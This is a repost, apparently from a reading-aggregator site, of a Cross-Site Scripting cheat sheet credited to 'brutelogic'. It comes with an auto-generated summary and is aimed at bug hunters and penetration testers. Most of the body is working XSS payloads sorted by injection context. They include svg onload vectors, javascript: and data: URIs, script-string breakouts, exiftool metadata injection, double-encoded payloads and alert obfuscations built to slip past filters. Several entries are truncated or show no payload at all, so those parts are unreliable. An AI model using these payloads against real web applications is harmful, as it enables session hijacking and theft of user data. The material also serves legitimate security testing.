avatarMRunal

Summary

The undefined website provides a comprehensive cheat sheet for Cross-Site Scripting (XSS) attacks, aimed at assisting security professionals in identifying and exploiting XSS vulnerabilities.

Abstract

The provided content from the undefined website outlines a detailed cheat sheet for Cross-Site Scripting (XSS), which is a prevalent security flaw in web applications. This resource is tailored for individuals involved in web security, including bug hunters, penetration testers, and security analysts. It emphasizes practical application, offering curated content and techniques for various XSS scenarios, such as HTML contexts, JavaScript injections, file upload vulnerabilities, and DOM insertions. The cheat sheet underscores the importance of adapting the provided information to specific scenarios and following instructions precisely to effectively exploit XSS vulnerabilities. It also touches on advanced topics like multi-reflection attacks, filter bypasses, and obfuscation techniques to evade detection by security mechanisms.

Opinions

  • The author emphasizes the need for users to adapt the provided XSS techniques to their unique scenarios, suggesting that a one-size-fits-all approach is not feasible due to the specific behaviors of target applications.
  • Strict adherence to the instructions and context (HTML or JavaScript) is highlighted as crucial for the successful execution of XSS payloads.
  • The cheat sheet is presented as a compilation of the author's own work and selected materials from their dedicated blog, implying a curated and expertly distilled collection of information.
  • The author expresses a hope that the cheat sheet will serve as a valuable and easy-to-follow reference for addressing most XSS-related challenges faced by security professionals.
  • The inclusion of advanced techniques such as multi-reflection and filter bypass methods indicates an understanding that real-world XSS exploitation often requires sophisticated and creative approaches to overcome modern security measures.
  • The cheat sheet acknowledges the diversity of XSS attack vectors by covering a wide range of injection points, including those that involve file metadata, DOM manipulation, and the use of the postMessage() method.
  • The author provides examples of obfuscation techniques to demonstrate how attackers can circumvent regular expression filters, showcasing the ongoing cat-and-mouse game between attackers and defenders in the realm of web security.

xss cheat sheet

Introduction This cheat sheet is meant to be used by bug hunters, penetration testers, security analysts, web application security students and enthusiasts. It’s about Cross-Site Scripting (XSS), the most widespread and common flaw found in the World Wide Web.

There’s lot of work done in this field and it’s not the purpose of this book to cover them all. What you will see here is XSS content created or curated by me. I’ve tried to select what I think it’s the most useful info about that universe, most of the time using material from my own blog which is dedicated to that very security flaw.

Keep in mind that you might need to adapt some of the info presented here to your own scenario (like single to double quotes and vice-versa). Although I try to give you directions about it, any non-imagined specific behavior from you target application might influence the outcome. A last tip: follow instructions strictly. If something is presented in an HTML fashion, it’s because it’s meant to be used that way. If not, it’s probably javascript code that can be used (respecting syntax) both in HTML and straight to existing js code. Unless told otherwise. I sincerely hope it becomes an easy-to-follow consulting material for most of your XSS related needs. Enjoy!

Basics

HTML Context — Simple Tag Injection

Use when input lands inside an attribute’s value of an HTML tag or outside tag except the ones described in next case. “>

HTML Context — In Block Tag Injection

Use when input lands inside or between opening/closing of the following tags: <style><script><textarea><noscript><pre><xmp> and <iframe> (</tag> is accordingly). </tag><svg onload=alert(1)> “></tag><svg onload=alert(1)>

HTML Context — Source Injection

Use when input lands as a value of the following HTML tag attributes: href, src, data or action (also formaction). For src in script tag use an external script call (URL) or “data:,alert(1)”. 2nd payload below alerts out of target’s context for Webkit browsers. javascript:alert(1) data:text/html,

Javascript Context — Code Injection in Logical Block

Use 1st or 2nd payloads when input lands in a script block, inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). If quote is escaped with a backslash, use 3rd payload. ‘}alert(1);{‘ ‘}alert(1)%0A{‘ \’}alert(1);{//

Javascript Context — Tag Injection

Use when input lands anywhere in a script block.

Advanced

Multi Reflection — Double Reflection (Single Input)

Use to take advantage of multiple reflections on same page. ‘onload=alert(1)>alert(1)

Multi Reflection — Triple Reflection (Single Input)

Use to take advantage of multiple reflections on same page. */alert(1)”>’onload=”/*’onload=”`’>alert(1)/*

Multi Input Reflections (Double & Triple)

Use to take advantage of multiple input reflections on same page. p= p=

File Upload Injection — Metadata

Use when metadata of uploaded file is reflected somewhere in target page. It uses command-line exiftool and any metadata field can be set. brute@logic:~$ exiftool -Artist=’”>’ xss.jpeg

File Upload Injection — SVG File

Use to create a stored XSS on target when uploading image files. Save content below as “xss.svg”.

DOM Insert Injection

Use to test for XSS when injection gets inserted into DOM as valid markup instead of being reflected in source code. It works for cases where script tag and other vectors won’t work.

DOM Insert Injection — Resource Request

Use when javascript code of the page inserts into page the results of a request to an URL controlled by attacker (injection). data:text/html, data:text/html,

Script Injection — No Closing

Use when there’s a closing script tag () somewhere in the code after reflection.

Javascript postMessage() DOM Injection (with Iframe)

Use when there’s a “message” event listener like in “window.addEventListener(‘message’, …)” in javascript code without a check for origin. Target must be able to be framed (X-Frame Options header according to context). Save as HTML file (or using data:text/html) providing TARGET_URL and INJECTION (a XSS vector or payload).

Filter Bypass

Mixed Case XSS

Use to bypass case-sensitive filters.

Unclosed Tags

Use in HTML injections to avoid filtering based in the presence of both lower than (<) and greater than (>) signs. It requires a native greater than sign in source code after input reflection.

Uppercase XSS

Use when application reflects input in uppercase.

Double Encoded XSS

Use when application performs double decoding of input. %253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E %2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

Alert without Parentheses (Strings Only)

Use in an HTML vector or javascript injection when parentheses are not allowed and a simple alert box is enough. alert`1`

Alert without Alphabetic Chars

Use when alphabetic characters are not allowed. Following is alert(1). [][‘\146\151\154\164\145\162’][‘\143\157\156\163\164\162\165\143\164\157\162’] (‘\141\154\145\162\164\50\61\51’)()

Alert Obfuscation

Use to trick several regular expression (regex) filters. It might be combined with previous alternatives (above). The shortest option “top” can also be replaced by “window”, “parent”, “self” or “this” depending on context. (alert)(1) a=alert,a(1) [1].find(alert) top[“al”+”ert”](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top[‘al\145rt’](1) top[8680439..toString(30)](1)

— brutelogic

Xss Attack
Bugs
JavaScript
Bug Bounty
Cybersecurity
Recommended from ReadMedium